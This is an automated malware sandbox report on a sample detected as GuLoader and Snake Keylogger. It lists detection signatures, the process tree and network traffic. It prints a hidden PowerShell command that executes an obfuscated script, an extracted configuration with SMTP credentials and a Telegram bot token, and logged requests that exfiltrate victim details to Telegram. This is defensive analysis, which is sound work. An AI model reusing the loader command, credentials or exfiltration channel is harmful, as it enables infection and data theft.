Edit tour

Windows Analysis Report
4Vx2rUlb0f.exe

Overview

General Information

Sample name:	4Vx2rUlb0f.exe renamed because original name is a hash value
Original sample name:	8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
Analysis ID:	1588252
MD5:	a1204c6a7fe28bab5db0e3240513a857
SHA1:	909f041efc5859b43f547017085e3cf39a05a4fa
SHA256:	8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

4Vx2rUlb0f.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\4Vx2rUlb0f.exe" MD5: A1204C6A7FE28BAB5DB0E3240513A857)

powershell.exe (PID: 7576 cmdline: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 3192 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50002

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", CommandLine: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4Vx2rUlb0f.exe", ParentImage: C:\Users\user\Desktop\4Vx2rUlb0f.exe, ParentProcessId: 7544, ParentProcessName: 4Vx2rUlb0f.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", ProcessId: 7576, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:11:28.215808+0100	2803305	3	Unknown Traffic	192.168.2.4	50006	104.21.112.1	443	TCP
2025-01-10T23:11:36.178494+0100	2803305	3	Unknown Traffic	192.168.2.4	50018	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:11:26.480660+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50004	132.226.247.73	80	TCP
2025-01-10T23:11:27.668006+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50004	132.226.247.73	80	TCP
2025-01-10T23:11:28.949280+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	50007	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:11:20.954898+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	50002	142.250.185.206	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T23:11:38.423143+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	50021	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 4Vx2rUlb0f.exe	Virustotal: Detection: 75%			Perma Link
Source: 4Vx2rUlb0f.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 4Vx2rUlb0f.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 4Vx2rUlb0f.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:50005 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2

Source: 4Vx2rUlb0f.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \System.Core.pdb-2X3 source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405841
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00406393 FindFirstFileW,FindClose,	0_2_00406393

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02FEF45Dh		7_2_02FEF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02FEF45Dh		7_2_02FEF4AC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:50021 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50007 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50004 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50006 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50002 -> 142.250.185.206:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50018 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:50005 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: msiexec.exe, 00000007.00000003.2829735978.000000000966E000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: g*.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:11:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000007.00000002.3053757639.0000000027583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 4Vx2rUlb0f.exe, 00000000.00000000.1784950404.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4Vx2rUlb0f.exe, 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.skinstudio.netG
Source: powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
